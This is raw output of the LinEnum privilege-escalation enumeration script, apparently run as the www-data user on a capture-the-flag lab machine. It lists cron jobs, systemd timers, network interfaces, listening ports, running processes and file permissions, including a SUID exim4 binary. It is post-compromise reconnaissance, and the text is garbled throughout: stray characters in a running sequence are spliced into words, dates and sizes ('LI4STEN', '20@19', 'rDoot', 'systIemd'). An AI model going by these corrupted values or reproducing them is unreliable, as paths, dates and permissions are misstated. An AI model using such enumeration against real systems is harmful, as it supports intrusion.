SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) # [-] Systemd timers: NEXT LEFT LAST PASSED UNIT ACTIVATES Thu 2020-04-02 17:09:00 EEST 8min left Thu 2020-04-02 16:39:01 EEST 21min ago phpsessionclean.timer phpsessionclean.service Thu 2020-04-02 22:08:23 EEST 5h 7min left Thu 2020-04-02 13:55:42 EEST 30h 5min ago apt-daily.timer apt-daily.service Fri 2020-04-03 04:03:49 EEST 11h left Thu 2020-04-02 04:03:49 EEST 12h ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service Fri 2020-04-03 05:01:23 EEST 12h left Thu 2020-04-02 16:30:51 EEST 30min ago motd-news.timer motd-news.service Fri 2020-04-03 06:13:41 EEST 13h left Thu 2020-04-02 06:27:07 EEST 10h ago apt-daily-upgrade.timer apt-daily-upgrade.service Mon 2020-04-06 00:00:00 EEST 3 days left Thu 2020-04-02 03:48:55 EEST 13h ago fstrim.timer fstrim.service n/a n/a n/a n/a ureadahead-stop.timer ureadahead-stop.service 7 timers listed. ### NETWORKING ########################################## [-] Network and IP info: ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 10.10.10.123 netmask 255.255.255.0 broadcast 10.10.10.255 1inet6 fe80::250:56ff:feb9:df8e prefixlen 64 scopeid 0x20<link> inet6 dead:beef::250:56ff:feb9:df8e prefixlen 64 scopeid 0x0<global> ether 00:50:56:b9:df:8e txqueuelen 1000 (Ethernet) RX packets 62577 bytes 4713575 (4.7 MB) RX errors 0 dropped 89 overruns 0 frame 0 TX packets 39635 bytes 5743591 (5.7 MB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 device interrupt 19 base 0x2000 lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 inet6 ::1 prefixlen 128 scopeid 0x10<host> loop txqueuelen 1000 (Local Loopback) RX packets 53082 bytes 3610482 (3.6 MB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 53082 bytes 3610482 (3.6 MB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 [-] ARP history: ? (10.10.10.2) at 00:50:56:b9:f9:ab [ether] on ens33 [-] Nameserver(s): names2erver 127.0.0.53 [-] Nameserver(s): Global DNSSEC NTA: 10.in-addr.arpa 16.172.in-addr.arpa 168.192.in-addr.arpa 17.172.in-addr.arpa 18.172.in-addr.arpa 19.172.in-addr.arpa 20.172.in-addr.arpa 21.172.in-addr.arpa 22.172.in-addr.arpa 23.172.in-addr.arpa 24.172.in-addr.arpa 25.172.in-addr.arpa 26.172.in-addr.arpa 27.172.in-addr.arpa 28.172.in-addr.arpa 29.172.in-addr.arpa 30.172.in-addr.arpa 31.172.in-addr.arpa corp d.f.ip6.arpa home internal intranet lan local 3 private test Link 2 (ens33) Current Scopes: DNS LLMNR setting: yes MulticastDNS setting: no DNSSEC setting: no DNSSEC supported: no DNS Servers: 8.8.8.8 8.8.4.4 [-] Default route: default 10.10.10.2 0.0.0.0 UG 0 0 0 ens33 [-] Listening TCP: Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 10.10.10.123:53 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:25 0.0.0.0:* LI4STEN - tcp 0 0 127.0.0.1:953 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN - tcp6 0 0 :::21 :::* LISTEN - tcp6 0 0 :::22 :::* LISTEN - tcp6 0 0 ::1:25 :::* LISTEN - tcp6 0 0 :::443 :::* LISTEN - tcp6 0 0 :::445 :::* LISTEN - tcp6 0 0 :::139 :::* LISTEN - tcp6 0 0 :::80 :::* LISTEN 5- [-] Listening UDP: Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name udp 0 0 10.10.10.123:53 0.0.0.0:* - udp 0 0 127.0.0.1:53 0.0.0.0:* - udp 2304 0 127.0.0.53:53 0.0.0.0:* - udp 46848 0 10.10.10.255:137 0.0.0.0:* - udp 1536 0 10.10.10.123:137 0.0.0.0:* - udp 46848 0 0.0.0.0:137 0.0.0.0:* - udp 34240 0 10.10.10.255:138 0.0.0.0:* - udp 0 0 10.10.10.123:138 0.0.0.0:* - udp 34240 6 0 0.0.0.0:138 0.0.0.0:* - ### SERVICES ############################################# [-] Running processes: USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.9 159428 8636 ? Ss 03:48 0:04 /sbin/init splash root 2 0.0 0.0 0 0 ? S 03:48 0:00 [kthreadd] root 4 0.0 0.0 0 0 ? I< 03:48 0:00 [kworker/0:0H] root 6 0.0 0.0 0 0 ? I< 03:48 0:00 [mm_percpu_wq] root 7 0.0 0.0 0 0 ? S 03:48 0:00 [ksoftirqd/0] root 8 0.0 0.0 0 0 ? I 03:48 0:06 [rcu_sched] root 9 0.0 0.0 0 0 ? I 03:48 0:00 [rcu_bh] root 10 0.0 0.0 0 0 ? S 03:48 0:00 [migration/0] root 11 0.0 0.0 0 0 ? S 03:48 0:00 [watchdog/0] root 12 0.0 0.0 7 0 0 ? S 03:48 0:00 [cpuhp/0] root 13 0.0 0.0 0 0 ? S 03:48 0:00 [kdevtmpfs] root 14 0.0 0.0 0 0 ? I< 03:48 0:00 [netns] root 15 0.0 0.0 0 0 ? S 03:48 0:00 [rcu_tasks_kthre] root 16 0.0 0.0 0 0 ? S 03:48 0:00 [kauditd] root 17 0.0 0.0 0 0 ? S 03:48 0:00 [khungtaskd] root 18 0.0 0.0 0 0 ? S 03:48 0:00 [oom_reaper] root 19 0.0 0.0 0 0 ? I< 03:48 0:00 [writeback] root 20 0.0 0.0 0 0 ? S 03:48 0:00 [kcompactd0] root 21 0.0 0.0 0 0 ? SN 03:48 0:00 [ksmd] root 22 0.0 0.0 0 0 ? SN 03:48 0:00 [khugepaged] root 23 0.0 0.0 0 0 ? I< 03:48 0:00 [crypto] root 24 0.0 0.0 0 0 ? I< 03:48 0:00 [kintegrityd] root 25 0.0 0.08 0 0 ? I< 03:48 0:00 [kblockd] root 26 0.0 0.0 0 0 ? I< 03:48 0:00 [ata_sff] root 27 0.0 0.0 0 0 ? I< 03:48 0:00 [md] root 28 0.0 0.0 0 0 ? I< 03:48 0:00 [edac-poller] root 29 0.0 0.0 0 0 ? I< 03:48 0:00 [devfreq_wq] root 30 0.0 0.0 0 0 ? I< 03:48 0:00 [watchdogd] root 32 0.0 0.0 0 0 ? I 03:48 0:19 [kworker/0:1] root 34 0.0 0.0 0 0 ? S 03:48 0:00 [kswapd0] root 35 0.0 0.0 0 0 ? S 03:48 0:00 [ecryptfs-kthrea] root 77 0.0 0.0 0 0 ? I< 03:48 0:00 [kthrotld] root 78 0.0 0.0 0 0 ? I< 03:48 0:00 [acpi_thermal_pm] root 79 0.0 0.0 0 0 ? S 03:48 0:00 [scsi_eh_0] root 80 0.0 0.0 0 0 ? I< 03:48 0:00 [scsi_tmf_0] 9root 81 0.0 0.0 0 0 ? S 03:48 0:00 [scsi_eh_1] root 82 0.0 0.0 0 0 ? I< 03:48 0:00 [scsi_tmf_1] root 88 0.0 0.0 0 0 ? I< 03:48 0:00 [ipv6_addrconf] root 89 0.0 0.0 0 0 ? I 03:48 0:05 [kworker/0:2] root 98 0.0 0.0 0 0 ? I< 03:48 0:00 [kstrp] root 115 0.0 0.0 0 0 ? I< 03:48 0:00 [charger_manager] root 167 0.0 0.0 0 0 ? S 03:48 0:00 [scsi_eh_2] root 168 0.0 0.0 0 0 ? I< 03:48 0:00 [scsi_tmf_2] root 169 0.0 0.0 0 0 ? I< 03:48 0:00 [vmw_pvscsi_wq_2] root 171 0.0 0.0 0 0 ? I< 03:48 0:00 [kworker/0:1H] root 172 0.0 0.0 0 0 ? I< 03:48 0:00 [ttm_swap] root 173 0.0 0.0 0 0 ? S 03:48 0:00 [irq/16-vmwgfx] root 194 0.0 0.0 0 0: ? S 03:48 0:00 [jbd2/sda1-8] root 195 0.0 0.0 0 0 ? I< 03:48 0:00 [ext4-rsv-conver] root 227 0.0 1.8 95376 17256 ? S<s 03:48 0:02 /lib/systemd/systemd-journald root 232 0.0 1.2 192652 11376 ? Ssl 03:48 0:34 /usr/bin/vmtoolsd root 253 0.0 0.4 45196 4224 ? Ss 03:48 0:00 /lib/systemd/systemd-udevd systemd+ 254 0.0 0.5 71820 5256 ? Ss 03:48 0:02 /lib/systemd/systemd-networkd systemd+ 367 0.0 0.3 141912 3216 ? Ssl 03:48 0:02 /lib/systemd/systemd-timesyncd systemd+ 368 0.0 0.6 70876 6108 ? Ss 03:48 0:04 /lib/systemd/systemd-resolved root 371 0.0 0.7 287540 7036 ? Ssl 03:48 0:01 /usr/lib/accountsservice/accounts-daemon root 375 0.0 0.3 31320 3256 ? Ss 03:48 0:00 /usr/sbin/cron -f root 378 0.0 1.8 170408 17240 ? Ssl 03:48 0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers ;message+ 380 0.0 0.4 50056 4528 ? Ss 03:48 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only root 381 0.0 1.0 87740 9864 ? Ss 03:48 0:00 /usr/bin/VGAuthService root 387 0.0 0.6 62004 5572 ? Ss 03:48 0:00 /lib/systemd/systemd-logind syslog 388 0.0 0.5 263036 4684 ? Ssl 03:48 0:00 /usr/sbin/rsyslogd -n bind 442 0.0 2.2 216820 21096 ? Ssl 03:48 0:00 /usr/sbin/named -f -4 -u bind root 450 0.0 0.6 72296 6388 ? Ss 03:48 0:00 /usr/sbin/sshd -D root 456 0.0 0.3 28676 2760 ? Ss 03:48 0:00 /usr/sbin/vsftpd /etc/vsftpd.conf root 464 0.0 0.2 16180 1960 tty1 Ss+ 03:48 0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux root 557 0.0 2.1 331720 19468 ? Ss 03:48 0:01 /usr/sbin/apache2 -k start www-data 558 0.0 2.0 336596 18468 ? S 03:48 0:00 /usr/sbin/apache2 -k start 0 0.0 4536 780 pts/0 S+ 17:00 0:00 tee -a www-data 14066 0.0 0.3 19300 2840 pts/0 S+ 17:01 0:00 /bin/bash ./LinEnum.sh -t www-data 14067 0.0 0.3 36700 3104 pts/0 R+ 17:01 0:00 ps aux [-] Process binaries and associated permissions (from above list): -rwxr-xr-x 1 root root 1113504 Apr 4 2018 /bin/bash lrwxrwxrwx 1 root root 4 Oct 5 2018 /bin/sh -> dash -rwxr-xr-x 1 root root 129096 Jul 20 2018 /lib/systemd/systemd-journald -rwxr-xr-x 1 root root 219272 Jul 20 2018 /lib/systemd/systemd-logind -rwxr-xr-x 1 root root 1616976 Jul 20 2018 /lib/systemd/systemd-networkd -rwxr-xr-x 1 root root 378944 Jul 20 2018 /lib/systemd/systemd-resolved -rwxr-xr-x 1 root root 38976 Jul 20 2018 /lib/systemd/systemd-timesyncd -rwxr-xr-x 1 root root 584136 Jul 20 2018 /lib/systemd/systemd-udevd -rwxr-xr-x 1 root root 56552 May 16 2018 /sbin/agetty lrwxrwxrwx 1 root root 20 Jul 20 2018 /sbin/init -> /lib/systemd/systemd -rwxr-xr-x 1 root root ? 125144 Oct 10 2018 /usr/bin/VGAuthService -rwxr-xr-x 1 root root 236584 Nov 16 2017 /usr/bin/dbus-daemon lrwxrwxrwx 1 root root 9 Jun 22 2018 /usr/bin/python3 -> python3.6 -rwxr-xr-x 1 root root 47360 Oct 10 2018 /usr/bin/vmtoolsd -rwxr-xr-x 1 root root 182552 Dec 18 2017 /usr/lib/accountsservice/accounts-daemon -rwxr-xr-x 1 root root 671392 Oct 3 2018 /usr/sbin/apache2 -rwxr-xr-x 1 root root 47416 Nov 16 2017 /usr/sbin/cron -rwsr-xr-x 1 root root 1140200 Feb 14 2018 /usr/sbin/exim4 -rwxr-xr-x 1 root root 790472 Aug 10 2018 /usr/sbin/named -rwxr-xr-x 1 root root 247832 Aug 6 2018 /usr/sbin/nmbd -rwxr-xr-x 1 root root 680488 Apr 24 2018 /usr/sbin/rsyslogd -rwxr-xr-x 1 root root 84064 Aug 6 2018 /usr/sbin/smbd -rwxr-xr-x 1 root root 786856 Feb 10 2018 /usr/sbin/sshd -rwxr-xr-x 1 root root 168200 Feb 5 2018 /usr/sbin/vsftpd [-] /etc/init.d/ binary permissions: total 144 drwxr-xr-x 2 root root 4096 Jan 23 2019 . drwxr-xr-x 90 root root 4096 Jan 23 20@19 .. -rwxr-xr-x 1 root root 2489 Jun 27 2018 apache-htcacheclean -rwxr-xr-x 1 root root 8181 Jun 27 2018 apache2 -rwxr-xr-x 1 root root 4335 Mar 22 2018 apparmor -rwxr-xr-x 1 root root 3431 Mar 23 2018 bind9 -rwxr-xr-x 1 root root 1232 Apr 19 2018 console-setup.sh -rwxr-xr-x 1 root root 3049 Nov 16 2017 cron -rwxr-xr-x 1 root root 2813 Nov 16 2017 dbus -rwxr-xr-x 1 root root 6754 Jan 28 2018 exim4 -rwxr-xr-x 1 root root 985 Jul 13 2018 grub-common -rwxr-xr-x 1 root root 3809 Feb 15 2018 hwclock.sh -rwxr-xr-x 1 root root 2444 Oct 25 2017 irqbalance -rwxr-xr-x 1 root root 1479 Feb 16 2018 keyboard-setup.sh -rwxr-xr-x 1 root root 2044 Aug 15 2017 kmod -rwxr-xr-x 1 root root 4597 Nov 25 2016 networking -rwxr-xr-x 1 root root 1938 Apr 18 2018 nmbd -rwxr-xr-x 1 root root 1846 Sep 10 2018 open-vm-tools -rwxr-xr-x 1 root root 1366 Jan 17 2018 plymouth -rwxr-xr-x 1 root root 752 Jan 17 2018 plymouth-log -rwxr-xr-x 1 root root 1191 Jan 18 2018 procps -rwxr-xr-x 1 root root A4355 Dec 13 2017 rsync -rwxr-xr-x 1 root root 2864 Jan 14 2018 rsyslog -rwxr-xr-x 1 root root 2263 Apr 18 2018 samba-ad-dc -rwxr-xr-x 1 root root 1879 Apr 18 2018 smbd -rwxr-xr-x 1 root root 3837 Jan 26 2018 ssh -rwxr-xr-x 1 root root 5974 Apr 20 2018 udev -rwxr-xr-x 1 root root 2083 Aug 15 2017 ufw -rwxr-xr-x 1 root root 1306 May 16 2018 uuidd -rwxr-xr-x 1 root root 2069 Aug 29 2016 vsftpd [-] /lib/systemd/* config file permissions: /lib/systemd/: total 7.3M drwxr-xr-x 23 root root 36K Jan 23 2019 system drwxr-xr-x 2 root root 4.0K Oct 5 2018 system-sleep drwxr-xr-x 2 root root 4.0K Oct 5 2018 network drwxr-xr-x 2 root root 4.0K Oct 5 2018 system-generators drwxr-xr-x 2 root root 4.0K Oct 5 2018 system-preset -rw-r--r-- 1 root root 2.3M Jul 20 2018 libsystemd-shared-237.so -rwxr-xr-x 1 root root 1.3K Jul 20 2018 set-cpufreq -rwxr-xr-x 1 root root 1.6M Jul 20 2018 systemd -rwxr-xr-x 1 root root 6.0K Jul 20 2018 systemd-ac-power -rwxr-xr-x 1 root root B 18K Jul 20 2018 systemd-backlight -rwxr-xr-x 1 root root 11K Jul 20 2018 systemd-binfmt -rwxr-xr-x 1 root root 10K Jul 20 2018 systemd-cgroups-agent -rwxr-xr-x 1 root root 22K Jul 20 2018 systemd-cryptsetup -rwxr-xr-x 1 root root 15K Jul 20 2018 systemd-dissect -rwxr-xr-x 1 root root 18K Jul 20 2018 systemd-fsck -rwxr-xr-x 1 root root 23K Jul 20 2018 systemd-fsckd -rwxr-xr-x 1 root root 19K Jul 20 2018 systemd-growfs -rwxr-xr-x 1 root root 10K Jul 20 2018 systemd-hibernate-resume -rwxr-xr-x 1 root root 23K Jul 20 2018 systemd-hostnamed -rwxr-xr-x 1 root root 15K Jul 20 2018 systemd-initctl -rwxr-xr-x 1 root root 127K Jul 20 2018 systemd-journald -rwxr-xr-x 1 root root 35K Jul 20 2018 systemd-localed -rwxr-xr-x 1 root root 215K Jul 20 2018 systemd-logind -rwxr-xr-x 1 root root 10K Jul 20 2018 systemd-makefs -rwxr-xr-x 1 root root 15K Jul 20 2018 systemd-modules-load -rwxr-xr-x 1 root root 1.6M Jul 20 2018 systemd-networkd -rwxr-xr-x 1 root root 19K Jul 20 2C018 systemd-networkd-wait-online -rwxr-xr-x 1 root root 11K Jul 20 2018 systemd-quotacheck -rwxr-xr-x 1 root root 10K Jul 20 2018 systemd-random-seed -rwxr-xr-x 1 root root 15K Jul 20 2018 systemd-remount-fs -rwxr-xr-x 1 root root 10K Jul 20 2018 systemd-reply-password -rwxr-xr-x 1 root root 371K Jul 20 2018 systemd-resolved -rwxr-xr-x 1 root root 19K Jul 20 2018 systemd-rfkill -rwxr-xr-x 1 root root 43K Jul 20 2018 systemd-shutdown -rwxr-xr-x 1 root root 19K Jul 20 2018 systemd-sleep -rwxr-xr-x 1 root root 23K Jul 20 2018 systemd-socket-proxyd -rwxr-xr-x 1 root root 11K Jul 20 2018 systemd-sulogin-shell -rwxr-xr-x 1 root root 15K Jul 20 2018 systemd-sysctl -rwxr-xr-x 1 root root 27K Jul 20 2018 systemd-timedated -rwxr-xr-x 1 root root 39K Jul 20 2018 systemd-timesyncd -rwxr-xr-x 1 root root 571K Jul 20 2018 systemd-udevd -rwxr-xr-x 1 root root 15K Jul 20 2018 systemd-update-utmp -rwxr-xr-x 1 root root 10K Jul 20 2018 systemd-user-sessions -rwxr-xr-x 1 root rDoot 10K Jul 20 2018 systemd-veritysetup -rwxr-xr-x 1 root root 10K Jul 20 2018 systemd-volatile-root -rwxr-xr-x 1 root root 1.3K Jun 22 2018 systemd-sysv-install drwxr-xr-x 2 root root 4.0K Apr 20 2018 system-shutdown -rw-r--r-- 1 root root 685 Jan 28 2018 resolv.conf /lib/systemd/system: total 864K drwxr-xr-x 2 root root 4.0K Oct 5 2018 apache2.service.d drwxr-xr-x 2 root root 4.0K Oct 5 2018 halt.target.wants drwxr-xr-x 2 root root 4.0K Oct 5 2018 initrd-switch-root.target.wants drwxr-xr-x 2 root root 4.0K Oct 5 2018 kexec.target.wants drwxr-xr-x 2 root root 4.0K Oct 5 2018 multi-user.target.wants drwxr-xr-x 2 root root 4.0K Oct 5 2018 poweroff.target.wants drwxr-xr-x 2 root root 4.0K Oct 5 2018 reboot.target.wants drwxr-xr-x 2 root root 4.0K Oct 5 2018 sysinit.target.wants drwxr-xr-x 2 root root 4.0K Oct 5 2018 getty.target.wants drwxr-xr-x 2 root root 4.0K Oct 5 2018 graphical.target.wants drwxr-xr-x 2 root root 4.0K Oct 5 2018 local-fs.target.wants drwxr-xr-x 2 rootE root 4.0K Oct 5 2018 rescue.target.wants drwxr-xr-x 2 root root 4.0K Oct 5 2018 sockets.target.wants drwxr-xr-x 2 root root 4.0K Oct 5 2018 timers.target.wants drwxr-xr-x 2 root root 4.0K Oct 5 2018 rc-local.service.d drwxr-xr-x 2 root root 4.0K Oct 5 2018 user@.service.d -rw-r--r-- 1 root root 412 Sep 12 2018 plymouth-halt.service -rw-r--r-- 1 root root 426 Sep 12 2018 plymouth-kexec.service lrwxrwxrwx 1 root root 27 Sep 12 2018 plymouth-log.service -> plymouth-read-write.service -rw-r--r-- 1 root root 421 Sep 12 2018 plymouth-poweroff.service -rw-r--r-- 1 root root 200 Sep 12 2018 plymouth-quit-wait.service -rw-r--r-- 1 root root 194 Sep 12 2018 plymouth-quit.service -rw-r--r-- 1 root root 244 Sep 12 2018 plymouth-read-write.service -rw-r--r-- 1 root root 416 Sep 12 2018 plymouth-reboot.service -rw-r--r-- 1 root root 532 Sep 12 2018 plymouth-start.service -rw-r--r-- 1 root root 291 Sep 12 2018 plymouth-switch-root.service lrwxrwxrwx 1 root root 21 Sep 12 2018 plymouFth.service -> plymouth-quit.service -rw-r--r-- 1 root root 490 Sep 12 2018 systemd-ask-password-plymouth.path -rw-r--r-- 1 root root 467 Sep 12 2018 systemd-ask-password-plymouth.service -rw-r--r-- 1 root root 306 Sep 11 2018 open-vm-tools.service -rw-r--r-- 1 root root 298 Sep 10 2018 vgauth.service -rw-r--r-- 1 root root 173 Aug 7 2018 motd-news.service -rw-r--r-- 1 root root 175 Aug 7 2018 motd-news.timer -rw-r--r-- 1 root root 417 Aug 6 2018 nmbd.service -rw-r--r-- 1 root root 384 Aug 6 2018 samba-ad-dc.service -rw-r--r-- 1 root root 429 Aug 6 2018 smbd.service lrwxrwxrwx 1 root root 14 Jul 20 2018 autovt@.service -> getty@.service lrwxrwxrwx 1 root root 9 Jul 20 2018 bootlogd.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 20 2018 bootlogs.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 20 2018 bootmisc.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 20 2018 checkfs.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 20 2018 checkrooGt-bootclean.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 20 2018 checkroot.service -> /dev/null -rw-r--r-- 1 root root 1.1K Jul 20 2018 console-getty.service -rw-r--r-- 1 root root 1.3K Jul 20 2018 container-getty@.service lrwxrwxrwx 1 root root 9 Jul 20 2018 cryptdisks-early.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 20 2018 cryptdisks.service -> /dev/null lrwxrwxrwx 1 root root 13 Jul 20 2018 ctrl-alt-del.target -> reboot.target lrwxrwxrwx 1 root root 25 Jul 20 2018 dbus-org.freedesktop.hostname1.service -> systemd-hostnamed.service lrwxrwxrwx 1 root root 23 Jul 20 2018 dbus-org.freedesktop.locale1.service -> systemd-localed.service lrwxrwxrwx 1 root root 22 Jul 20 2018 dbus-org.freedesktop.login1.service -> systemd-logind.service lrwxrwxrwx 1 root root 25 Jul 20 2018 dbus-org.freedesktop.timedate1.service -> systemd-timedated.service -rw-r--r-- 1 root root 1.1K Jul 20 2018 debug-shell.service lrwxrwxrwx 1 root root 16 Jul 20 2018 dHefault.target -> graphical.target -rw-r--r-- 1 root root 797 Jul 20 2018 emergency.service lrwxrwxrwx 1 root root 9 Jul 20 2018 fuse.service -> /dev/null -rw-r--r-- 1 root root 2.0K Jul 20 2018 getty@.service lrwxrwxrwx 1 root root 9 Jul 20 2018 halt.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 20 2018 hostname.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 20 2018 hwclock.service -> /dev/null -rw-r--r-- 1 root root 670 Jul 20 2018 initrd-cleanup.service -rw-r--r-- 1 root root 830 Jul 20 2018 initrd-parse-etc.service -rw-r--r-- 1 root root 589 Jul 20 2018 initrd-switch-root.service -rw-r--r-- 1 root root 704 Jul 20 2018 initrd-udevadm-cleanup-db.service lrwxrwxrwx 1 root root 9 Jul 20 2018 killprocs.service -> /dev/null -rw-r--r-- 1 root root 717 Jul 20 2018 kmod-static-nodes.service lrwxrwxrwx 1 root root 28 Jul 20 2018 kmod.service -> systemd-modules-load.service lrwxrwxrwx 1 root root 28 Jul 20 2018 module-init-tools.service -> systIemd-modules-load.service lrwxrwxrwx 1 root root 9 Jul 20 2018 motd.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 20 2018 mountall-bootclean.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 20 2018 mountall.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 20 2018 mountdevsubfs.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 20 2018 mountkernfs.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 20 2018 mountnfs-bootclean.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 20 2018 mountnfs.service -> /dev/null lrwxrwxrwx 1 root root 22 Jul 20 2018 procps.service -> systemd-sysctl.service -rw-r--r-- 1 root root 609 Jul 20 2018 quotaon.service -rw-r--r-- 1 root root 716 Jul 20 2018 rc-local.service lrwxrwxrwx 1 root root 16 Jul 20 2018 rc.local.service -> rc-local.service lrwxrwxrwx 1 root root 9 Jul 20 2018 rc.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 20 2018 rcS.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 20 J 2018 reboot.service -> /dev/null -rw-r--r-- 1 root root 788 Jul 20 2018 rescue.service lrwxrwxrwx 1 root root 9 Jul 20 2018 rmnologin.service -> /dev/null lrwxrwxrwx 1 root root 15 Jul 20 2018 runlevel0.target -> poweroff.target lrwxrwxrwx 1 root root 13 Jul 20 2018 runlevel1.target -> rescue.target lrwxrwxrwx 1 root root 17 Jul 20 2018 runlevel2.target -> multi-user.target lrwxrwxrwx 1 root root 17 Jul 20 2018 runlevel3.target -> multi-user.target lrwxrwxrwx 1 root root 17 Jul 20 2018 runlevel4.target -> multi-user.target lrwxrwxrwx 1 root root 16 Jul 20 2018 runlevel5.target -> graphical.target lrwxrwxrwx 1 root root 13 Jul 20 2018 runlevel6.target -> reboot.target lrwxrwxrwx 1 root root 9 Jul 20 2018 sendsigs.service -> /dev/null -rw-r--r-- 1 root root 1.5K Jul 20 2018 serial-getty@.service lrwxrwxrwx 1 root root 9 Jul 20 2018 single.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 20 2018 stop-bootlogd-single.service -> /devK/null lrwxrwxrwx 1 root root 9 Jul 20 2018 stop-bootlogd.service -> /dev/null -rw-r--r-- 1 root root 554 Jul 20 2018 suspend-then-hibernate.target -rw-r--r-- 1 root root 1.4K Jul 20 2018 system-update-cleanup.service -rw-r--r-- 1 root root 724 Jul 20 2018 systemd-ask-password-console.service -rw-r--r-- 1 root root 752 Jul 20 2018 systemd-ask-password-wall.service -rw-r--r-- 1 root root 752 Jul 20 2018 systemd-backlight@.service -rw-r--r-- 1 root root 999 Jul 20 2018 systemd-binfmt.service -rw-r--r-- 1 root root 537 Jul 20 2018 systemd-exit.service -rw-r--r-- 1 root root 714 Jul 20 2018 systemd-fsck-root.service -rw-r--r-- 1 root root 715 Jul 20 2018 systemd-fsck@.service -rw-r--r-- 1 root root 551 Jul 20 2018 systemd-fsckd.service -rw-r--r-- 1 root root 540 Jul 20 2018 systemd-fsckd.socket -rw-r--r-- 1 root root 584 Jul 20 2018 systemd-halt.service -rw-r--r-- 1 root root 671 Jul 20 2018 systemd-hibernate-resume@.service -rw-r--r-- 1 root root 541 Jul 20 2018 systemd-hiberLnate.service -rw-r--r-- 1 root root 1.1K Jul 20 2018 systemd-hostnamed.service -rw-r--r-- 1 root root 818 Jul 20 2018 systemd-hwdb-update.service -rw-r--r-- 1 root root 559 Jul 20 2018 systemd-hybrid-sleep.service -rw-r--r-- 1 root root 551 Jul 20 2018 systemd-initctl.service -rw-r--r-- 1 root root 771 Jul 20 2018 systemd-journal-flush.service -rw-r--r-- 1 root root 686 Jul 20 2018 systemd-journald-audit.socket -rw-r--r-- 1 root root 1.6K Jul 20 2018 systemd-journald.service -rw-r--r-- 1 root root 597 Jul 20 2018 systemd-kexec.service -rw-r--r-- 1 root root 1.1K Jul 20 2018 systemd-localed.service -rw-r--r-- 1 root root 1.5K Jul 20 2018 systemd-logind.service -rw-r--r-- 1 root root 733 Jul 20 2018 systemd-machine-id-commit.service -rw-r--r-- 1 root root 1007 Jul 20 2018 systemd-modules-load.service -rw-r--r-- 1 root root 740 Jul 20 2018 systemd-networkd-wait-online.service -rw-r--r-- 1 root root 1.9K Jul 20 2018 systemd-networkd.service -rw-r--r-- 1 root root 593 Jul 20 2018 systemMd-poweroff.service -rw-r--r-- 1 root root 655 Jul 20 2018 systemd-quotacheck.service -rw-r--r-- 1 root root 792 Jul 20 2018 systemd-random-seed.service -rw-r--r-- 1 root root 588 Jul 20 2018 systemd-reboot.service -rw-r--r-- 1 root root 833 Jul 20 2018 systemd-remount-fs.service -rw-r--r-- 1 root root 1.7K Jul 20 2018 systemd-resolved.service -rw-r--r-- 1 root root 724 Jul 20 2018 systemd-rfkill.service -rw-r--r-- 1 root root 573 Jul 20 2018 systemd-suspend-then-hibernate.service -rw-r--r-- 1 root root 537 Jul 20 2018 systemd-suspend.service -rw-r--r-- 1 root root 693 Jul 20 2018 systemd-sysctl.service -rw-r--r-- 1 root root 1.1K Jul 20 2018 systemd-timedated.service -rw-r--r-- 1 root root 1.4K Jul 20 2018 systemd-timesyncd.service -rw-r--r-- 1 root root 659 Jul 20 2018 systemd-tmpfiles-clean.service -rw-r--r-- 1 root root 764 Jul 20 2018 systemd-tmpfiles-setup-dev.service -rw-r--r-- 1 root root 744 Jul 20 2018 systemd-tmpfiles-setup.service -rw-r--r-- 1 root root 863 Jul 20 201N8 systemd-udev-settle.service -rw-r--r-- 1 root root 755 Jul 20 2018 systemd-udev-trigger.service -rw-r--r-- 1 root root 985 Jul 20 2018 systemd-udevd.service -rw-r--r-- 1 root root 797 Jul 20 2018 systemd-update-utmp-runlevel.service -rw-r--r-- 1 root root 794 Jul 20 2018 systemd-update-utmp.service -rw-r--r-- 1 root root 628 Jul 20 2018 systemd-user-sessions.service -rw-r--r-- 1 root root 690 Jul 20 2018 systemd-volatile-root.service lrwxrwxrwx 1 root root 21 Jul 20 2018 udev.service -> systemd-udevd.service lrwxrwxrwx 1 root root 9 Jul 20 2018 umountfs.service -> /dev/null lrwxrwxrwx 1 root root 9 